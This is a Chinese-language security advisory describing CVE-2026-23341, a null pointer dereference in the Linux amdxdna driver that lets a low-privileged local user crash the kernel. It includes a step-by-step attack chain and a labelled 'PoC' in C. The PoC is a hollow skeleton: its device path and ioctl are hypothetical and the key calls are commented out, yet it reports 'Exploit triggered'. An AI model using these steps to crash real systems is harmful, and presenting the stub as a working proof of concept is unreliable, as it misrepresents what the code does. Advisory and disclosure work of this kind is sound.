CVE-2026-23341 CVSS 5.5 中危

CVE-2026-23341: Linux内核amdxdna驱动崩溃漏洞

披露日期: 2026-03-25

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-23341

漏洞类型

空指针解引用

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的accel/amdxdna驱动程序存在一个安全漏洞。当用户空间程序尝试销毁一个已经被系统自动挂起的硬件上下文时，由于驱动程序未对邮箱通道指针进行有效性检查，直接访问了空指针。这导致内核发生崩溃，从而引发拒绝服务攻击。该漏洞要求攻击者具有本地低权限。

技术细节

该漏洞源于Linux内核accel/amdxdna驱动中的aie2_destroy_context函数。当硬件上下文进入挂起状态时，其对应的mailbox channel指针会被置为NULL。漏洞触发点在于，如果用户空间通过ioctl系统调用请求销毁该已挂起的上下文，驱动代码在执行销毁逻辑前未判断mailbox channel指针是否为空，直接对其进行解引用操作。这种空指针解引用会导致内核异常，通常表现为内核恐慌（Kernel Panic）或Oops，进而导致系统重启或无响应。由于CVSS向量为AV:L/PR:L，攻击者仅需本地低权限账号即可利用此漏洞破坏系统可用性。

攻击链分析

STEP 1

步骤1：获取本地访问权限

攻击者需要在目标Linux系统上拥有低权限用户账号。

STEP 2

步骤2：打开 vulnerable 设备

攻击者打开AMD XDNA驱动对应的设备节点（如/dev/accel/...）。

STEP 3

步骤3：创建并挂起上下文

通过系统调用创建硬件上下文，并使其进入空闲状态以触发自动挂起机制，导致mailbox channel指针被置空。

STEP 4

步骤4：触发销毁操作

攻击者利用ioctl命令请求销毁该已被挂起的硬件上下文。

STEP 5

步骤5：内核崩溃

驱动程序在aie2_destroy_context函数中访问空指针，导致内核崩溃，系统拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-23341
 * Concept: Trigger NULL pointer dereference in amdxdna driver
 * by destroying a suspended context.
 */
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>

#define DEVICE_PATH "/dev/accel/accel0" // Hypothetical device path
#define DESTROY_CONTEXT_IOCTL 0x4001     // Hypothetical IOCTL command

int main() {
    int fd;
    printf("[+] Attempting to open device...\n");
    fd = open(DEVICE_PATH, O_RDWR);
    if (fd < 0) {
        perror("[-] Failed to open device");
        return 1;
    }

    printf("[+] Device opened. Creating context...\n");
    // Step 1: Create a context (Implementation specific)
    // int ctx_id = create_context(fd);

    printf("[+] Waiting for context to auto-suspend...\n");
    // Step 2: Wait for idle timeout to trigger automatic suspension
    sleep(10); 

    printf("[+] Attempting to destroy suspended context...\n");
    // Step 3: Issue ioctl to destroy context without checking NULL pointer
    // if (ioctl(fd, DESTROY_CONTEXT_IOCTL, &ctx_id) < 0) {
    //     perror("ioctl failed");
    // }
    
    // If vulnerable, kernel crashes here
    printf("[+] Exploit triggered.\n");
    close(fd);
    return 0;
}

影响范围

Linux Kernel (accel/amdxdna driver versions prior to commit 8363c02863332992a1822688da41f881d88d1631)

防御指南

临时缓解措施

建议立即应用官方提供的补丁程序，修复aie2_destroy_context函数中的空指针检查逻辑。若无法立即升级内核，可通过权限管理限制本地用户对相关驱动的访问。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表